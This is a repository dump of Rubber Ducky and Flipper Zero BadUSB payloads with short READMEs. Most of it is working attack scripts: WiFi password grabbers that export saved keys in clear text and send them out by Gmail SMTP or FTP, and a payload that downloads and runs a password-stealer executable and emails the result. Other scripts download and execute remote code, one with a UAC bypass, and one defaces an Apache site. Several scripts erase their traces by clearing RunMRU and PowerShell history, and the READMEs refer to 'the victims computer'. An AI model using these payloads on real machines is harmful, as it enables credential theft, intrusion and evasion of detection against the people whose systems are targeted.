a new Obfuscated CMD 30 | DELAY 3000 31 | WINDOWS r 32 | DELAY 200 33 | STRING cmd 34 | ENTER 35 | DELAY 200 36 | STRING MODE 20,1 37 | ENTER 38 | DELAY 200 39 | STRING COLOR FE 40 | ENTER 41 | DELAY 200 42 | REM --> Email CSV via GMAIL 43 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$SMTPInfo = New-Object Net.Mail.SmtpClient('smtp.gmail.com', 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('SENDERSEMAIL@GMAIL.COM', 'SENDERSPASSWORD'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'SENDERSEMAIL@GMAIL.COM'; $ReportEmail.To.Add('RECIEVER@GMAIL.COM'); $ReportEmail.Subject = 'WiFi Report'; $ReportEmail.Body = 'Attached is your WiFi report.'; $ReportEmail.Attachments.Add('temp.csv'); $SMTPInfo.Send($ReportEmail)" 44 | ENTER 45 | REM --> Then cover your tracks. You were never here. 46 | DELAY 500 47 | STRING del temp.csv 48 | ENTER 49 | DELAY 500 50 | STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 51 | ENTER 52 | DELAY 500 53 | STRING exit 54 | ENTER 55 | -------------------------------------------------------------------------------- /Needs Updating/WiFi Password Exfiltration/inject.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Meldramiriel/duckyscript-for-flipperzero/017c1fb6ef3c20526fcc6abe65fe784f013f56fc/Needs Updating/WiFi Password Exfiltration/inject.bin -------------------------------------------------------------------------------- /Needs Updating/Wifi Password Grabber to FTP/duckycode.txt: -------------------------------------------------------------------------------- 1 | REM Minimize all windows 2 | GUI d 3 | DELAY 1000 4 | REM Open cmd 5 | GUI r 6 | DELAY 1000 7 | STRING cmd 8 | ENTER 9 | DELAY 1000 10 | 11 | REM --> Getting SSID 12 | STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A 13 | ENTER 14 | 15 | REM --> Creating A.txt 16 | STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt 17 | ENTER 18 | 19 | REM --> Get network type 20 | STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A 21 | ENTER 22 | 23 | REM --> Get authentication 24 | STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A 25 | ENTER 26 | 27 | REM --> Get password 28 | STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A 29 | ENTER 30 | 31 | REM --> Delete A.txt 32 | STRING del A.txt 33 | ENTER 34 | 35 | REM --> Create Log.txt 36 | STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt 37 | ENTER 38 | 39 | REM Upload file using FTP 40 | GUI R 41 | DELAY 200 42 | STRING cmd 43 | ENTER 44 | DELAY 200 45 | STRING ftp 46 | ENTER 47 | STRING o 48 | ENTER 49 | STRING [FTP server external IP] 21 50 | ENTER 51 | DELAY 5000 52 | STRING [UserName] 53 | ENTER 54 | STRING [Password] 55 | ENTER 56 | DELAY 1000 57 | STRING put %USERNAME%\Desktop\Log.txt 58 | ENTER 59 | DELAY 5000 60 | STRING exit 61 | ENTER 62 | 63 | REM Delete Log.txt and exit 64 | GUI r 65 | DELAY 1000 66 | STRING cmd 67 | ENTER 68 | DELAY 1000 69 | STRING del Log.txt & exit 70 | ENTER -------------------------------------------------------------------------------- /Needs Updating/Wifi Password Grabber to FTP/inject.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Meldramiriel/duckyscript-for-flipperzero/017c1fb6ef3c20526fcc6abe65fe784f013f56fc/Needs Updating/Wifi Password Grabber to FTP/inject.bin -------------------------------------------------------------------------------- /Needs Updating/Wifi-Grab/README.md: -------------------------------------------------------------------------------- 1 | # Wifi-Password-Grabber 2 | A simple powershell script to get all the saved wifi password from a computer and send the output through gmail. 3 | 4 | ### Powershell Script 5 | Edit the script and provide the email to be use to send and receive the output then run the script to the victims computer. 6 | 7 | ### Payloads 8 | Used to automatically download and run the script to the victims computer using a Bad USB. 9 | - Rubber Ducky 10 | - Cactus WHID 11 | -------------------------------------------------------------------------------- /Needs Updating/Wifi-Grab/cactuswhid.txt: -------------------------------------------------------------------------------- 1 | Rem:the powershell script and this payload can be found at 2 | Rem:https://github.com/axel05869/Wifi-Grab 3 | 4 | Rem:--------GUIDE--------- 5 | Rem:download the powershell script. 6 | Rem:edit and add the required data. 7 | Rem:copy and paste all the text to notepad and save as anyname.txt. 8 | Rem:upload the text to: https://cutt.ly/WjnNPa4 9 | Rem:copy the direct download link. 10 | 11 | CustomDelay:500 12 | 13 | Rem:Opens the Windows Run prompt. 14 | Press:131+114 15 | 16 | Rem:Delays 0.2 seconds to give the Run prompt time to open. 17 | CustomDelay:200 18 | 19 | Rem:this command will download the text and save as d.ps1 then run 20 | Rem:if the script failed to run change the ExecPolicy to Bypass 21 | Print:powershell /w 1 /C Set-ExecutionPolicy RemoteSigned;wget \"DOWNLOAD_LINK\" -o \d.ps1;\d.ps1 22 | 23 | Rem:Presses Ctrl + Shift + Enter to execute the PowerShell with administrative privileges. 24 | Press:128+129+176 25 | 26 | Rem:Delay 0.5 seconds to give the UAC prompt time to open. 27 | CustomDelay:500 28 | 29 | Rem:Presses Alt + Y to bypass UAC. 30 | Press:130+121 31 | -------------------------------------------------------------------------------- /Needs Updating/Wifi-Grab/duckypayload.txt: -------------------------------------------------------------------------------- 1 | REM the powershell script and this payload can be found at 2 | REM https://github.com/axel05869/Wifi-Grab 3 | 4 | REM --------GUIDE--------- 5 | REM download the powershell script. 6 | REM edit and add the required data. 7 | REM copy and paste all the text to notepad and save as anyname.txt. 8 | REM upload the text to: https://cutt.ly/WjnNPa4 9 | REM copy the direct download link. 10 | 11 | DELAY 500 12 | 13 | REM Opens the Windows Run prompt. 14 | GUI r 15 | 16 | REM Delays 0.2 seconds to give the Run prompt time to open. 17 | DELAY 200 18 | 19 | REM this command will download the text and save as d.ps1 then run 20 | REM if the script failed to run change the ExecPolicy to Bypass 21 | STRING powershell /w 1 /C Set-ExecutionPolicy RemoteSigned;wget "DOWNLOAD_LINK" -o \d.ps1;\d.ps1 22 | 23 | REM Presses Ctrl + Shift + Enter to execute the PowerShell with administrative privileges. 24 | CTRL-SHIFT ENTER 25 | 26 | REM Delay 0.5 seconds to give the UAC prompt time to open. 27 | DELAY 500 28 | 29 | REM Presses Alt + Y to bypass UAC. 30 | ALT y 31 | -------------------------------------------------------------------------------- /Needs Updating/Windows Password to Email/duckycode.txt: -------------------------------------------------------------------------------- 1 | DELAY 200 2 | GUI r 3 | DELAY 200 4 | STRING powershell -NoP -NonI -Exec Bypass 5 | ENTER 6 | DELAY 500 7 | REM scarica STEALER PWD ---------------- 8 | STRING $down = New-Object System.Net.WebClient; $url = 'https://1fichier.com/?txl995libj'; $file = 'pass.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit; 9 | REM scarica STEALER PWD ---------------- 10 | ENTER 11 | DELAY 4000 12 | CONTROL a 13 | DELAY 100 14 | CONTROL s 15 | DELAY 500 16 | STRING %userprofile%\ciaone.txt 17 | DELAY 400 18 | ENTER 19 | ENTER 20 | DELAY 300 21 | ALT F4 22 | ALT F4 23 | DELAY 200 24 | GUI r 25 | DELAY 200 26 | STRING powershell -NoP -NonI -Exec Bypass 27 | ENTER 28 | REM scarica client email ---------------- 29 | DELAY 500 30 | STRING $down = New-Object System.Net.WebClient; $url = 'https://1fichier.com/?d1xgmwc5bl'; $file = 'SENDeMAIL.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application;exit; 31 | REM scarica client email ---------------- 32 | ENTER 33 | DELAY 4000 34 | F4 35 | GUI r 36 | DELAY 200 37 | STRING powershell 38 | ENTER 39 | DELAY 500 40 | STRING cd $home 41 | ENTER 42 | DELAY 500 43 | STRING .\SENDeMAIL -o tls=yes -f KaliStealthBOT@gmail.com -t INSERT-YOUR@EMAIL-HERE -s mail.smtp2go.com:2525 -xu PUT-LOGIN-HERE -xp PUT-YOUR-PWD -u 'STEALED PWD' -a .\ciaone.txt -m 'How are you? I have a suprise for you :) see attachments.' 44 | ENTER 45 | DELAY 2000 46 | REM rimuovi ogni traccia / remove all trace ---------------- 47 | STRING Remove-Item pass.exe -recurse 48 | ENTER 49 | STRING Remove-Item pass.cfg -recurse 50 | ENTER 51 | STRING Remove-Item SENDeMAIL.exe -recurse 52 | ENTER 53 | STRING Remove-Item ciaone.txt -recurse 54 | ENTER 55 | REM rimuovi ogni traccia / remove all trace ---------------- 56 | STRING exit 57 | ENTER -------------------------------------------------------------------------------- /Needs Updating/Windows Password to Email/inject (1).bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Meldramiriel/duckyscript-for-flipperzero/017c1fb6ef3c20526fcc6abe65fe784f013f56fc/Needs Updating/Windows Password to Email/inject (1).bin -------------------------------------------------------------------------------- /Needs Updating/Windows Password to Email/inject.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Meldramiriel/duckyscript-for-flipperzero/017c1fb6ef3c20526fcc6abe65fe784f013f56fc/Needs Updating/Windows Password to Email/inject.bin -------------------------------------------------------------------------------- /Needs Updating/auto defacer: -------------------------------------------------------------------------------- 1 | REM Auto Defacer for Ubuntu Based Machines running Apache. 2 | REM Author: Xcellerator 3 | REM Description: Automatically defaces index page of an apache web server. 4 | DEFAULT_DELAY 200 5 | ALT F2 6 | STRING terminal 7 | ENTER 8 | STRING cd /var/www 9 | ENTER 10 | STRING mv index.* index.bak 11 | ENTER 12 | STRING touch index.html 13 | ENTER 14 | STRING nano index.html 15 | ENTER 16 | STRING

You have been hacked by the USB Rubber Ducky!

17 | ENTER 18 | STRING
19 | ENTER 20 | STRING
Your old index page can be found here.
21 | CONTROL x 22 | STRING y 23 | ENTER 24 | STRING exit 25 | ENTER 26 | -------------------------------------------------------------------------------- /Needs Updating/wifi-grabber-rubberducky/README.md: -------------------------------------------------------------------------------- 1 | # wifi-grabber-rubberducky 2 | Script made by @norepository based on the code of Siem TTommy 3 | - Simple script for Rubber Ducky that download wifi credentials, compress and send them to an email. After all console history and the file will be deleted automatically 4 | - Make sure to change SENDER-EMAIL and SENDER-PASSWORD with credentials of the gmail account that will send the email and RECEIVER-EMAIL with the email that will receive the zip file 5 | - Make sure to allow less secure app by clicking here: https://myaccount.google.com/lesssecureapps 6 | 7 | 8 | For any question dm me on discord tony#5678 9 | -------------------------------------------------------------------------------- /Needs Updating/wifi-grabber-rubberducky/wifi_grabber_rubberducky.txt: -------------------------------------------------------------------------------- 1 | REM Title: WiFi-Harvester 2 | REM Author: tony 3 | REM Based on the code of: Siem TTommy 4 | REM: Version 1.1 5 | DELAY 2000 6 | GUI d 7 | DELAY 150 8 | GUI r 9 | DELAY 400 10 | STRING cmd 11 | ENTER 12 | DELAY 500 13 | STRING color FE & mode con:cols=18 lines=1 14 | ENTER 15 | REM --> Harvest 16 | STRING cd Desktop 17 | ENTER 18 | STRING mkdir A 19 | ENTER 20 | STRING cd A 21 | ENTER 22 | STRING netsh wlan export profile key=clear 23 | ENTER 24 | DELAY 200 25 | STRING cd .. 26 | ENTER 27 | STRING powershell 28 | ENTER 29 | STRING Compress-Archive -Path A -DestinationPath A.zip 30 | ENTER 31 | REM --> Report 32 | REM --> Allow less secure app here https://myaccount.google.com/lesssecureapps 33 | DELAY 500 34 | STRING $SMTPServer = 'smtp.gmail.com' 35 | ENTER 36 | STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 37 | ENTER 38 | STRING $SMTPInfo.EnableSsl = $true 39 | ENTER 40 | STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('SENDER-EMAIL', 'SENDER-PASSWORD') 41 | ENTER 42 | STRING $ReportEmail = New-Object System.Net.Mail.MailMessage 43 | ENTER 44 | STRING $ReportEmail.From = 'SENDER-EMAIL' 45 | ENTER 46 | STRING $ReportEmail.To.Add('RECEIVER-EMAIL') 47 | ENTER 48 | STRING $ReportEmail.Subject = "Harvest-Report" 49 | ENTER 50 | STRING $ReportEmail.Body = "GG, you got it" 51 | ENTER 52 | STRING $ReportEmail.Attachments.Add("A.zip") 53 | ENTER 54 | STRING $SMTPInfo.Send($ReportEmail) 55 | ENTER 56 | DELAY 400 57 | REM --> Clean up 58 | STRING REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f 59 | ENTER 60 | STRING cd .. 61 | ENTER 62 | STRING cd AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine 63 | ENTER 64 | STRING del ConsoleHost_history.txt 65 | ENTER 66 | STRING exit 67 | ENTER 68 | DELAY 100 69 | STRING del A & rmdir A 70 | ENTER 71 | STRING S 72 | ENTER 73 | STRING del A.zip & exit 74 | ENTER 75 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # duckyscript-for-flipperzero 2 | Collecting of ducky scripts that I've created for my own use. 3 | -------------------------------------------------------------------------------- /WIP [Powershell] Export Wifi Password WIndows 10/payload.txt: -------------------------------------------------------------------------------- 1 | # Function to generate a random 6-digit number 2 | Function Get-RandomNumber { 3 | return (Get-Random -Minimum 100000 -Maximum 999999) 4 | } 5 | 6 | # Function to create a new folder with the generated number 7 | Function New-FolderWithRandomName { 8 | # Check if C:\temp folder exists 9 | if (!(Test-Path -Path 'C:\temp')) { 10 | # Create the C:\temp folder 11 | New-Item -ItemType Directory -Path 'C:\temp' 12 | } 13 | 14 | # Get the random number 15 | $rand = Get-RandomNumber 16 | # Create the folder with the random number as its name 17 | $newFolder = New-Item -ItemType Directory -Path "C:\temp\$rand" 18 | return $newFolder.FullName 19 | } 20 | 21 | # Create the random folder and assign its name to a variable 22 | $randomFolder = New-FolderWithRandomName 23 | 24 | # Function to export wireless network profiles 25 | Function Export-WirelessNetworkProfiles { 26 | param($folderPath) 27 | try { 28 | netsh wlan export profile key=clear folder="$folderPath" 29 | } catch { 30 | Write-Output "Error: Wireless network profiles not found on the computer" 31 | } 32 | } 33 | 34 | # Export wireless network profiles to the random folder 35 | Export-WirelessNetworkProfiles -folderPath $randomFolder -------------------------------------------------------------------------------- /WIP [Powershell] Export Wifi Password WIndows 10/readme.md: -------------------------------------------------------------------------------- 1 | My attempt at building a powershell script complete with functions to exfiltrate Windows Wifi Profiles with the passwords, still a work in progress. 2 | -------------------------------------------------------------------------------- /WIP. [CMD] Export Wifi Passwords Windows 11/payload.txt: -------------------------------------------------------------------------------- 1 | netsh wlan export profile key=clear folder="c:\directory" -------------------------------------------------------------------------------- /WIP. [CMD] Export Wifi Passwords Windows 11/readme.md: -------------------------------------------------------------------------------- 1 | This is the bare minimum you need to extract Windows 11 WIFI profiles and passwords. 2 | Normally they get encrypted if you try to export them but this method works. 3 | 4 | -------------------------------------------------------------------------------- /WIP. [Powershel] Run Script from Github/payload.txt: -------------------------------------------------------------------------------- 1 | REM Download script from pastebin 2 | DELAY 1000 3 | GUI r 4 | DELAY 500 5 | STRING powershell 6 | DELAY 500 7 | ENTER 8 | DELAY 1000 9 | REM Change the link at the end for your payload 10 | STRING (new-object System.Net.WebClient).DownloadString('https://pastebin.com/raw/your_script_link') | iex 11 | DELAY 1000 12 | ENTER -------------------------------------------------------------------------------- /WIP. [Powershel] Run Script from Github/readme.md: -------------------------------------------------------------------------------- 1 | This script will open the Run dialog by pressing the Windows key and the "r" key. 2 | Then it will wait for 500 milliseconds and type the word "powershell" and press enter. 3 | 4 | Next, it will wait for 1 second and will download the script from pastebin by using the command 5 | "(new-object System.Net.WebClient).DownloadString('https://pastebin.com/raw/your_script_link') | iex" and press enter to run the script. 6 | 7 | Please be aware that this script is intended to be used for legal and ethical purposes. 8 | Downloading and running scripts from untrusted sources can be dangerous and may compromise the security of the device. 9 | Also, you have to replace https://pastebin.com/raw/your_script_link with the actual link of the pastebin script you want to download and run. 10 | 11 | Also, please note that this script is intended to be used in a legal and ethical manner. 12 | Use this script without proper authorization from the device's owner may be illegal. --------------------------------------------------------------------------------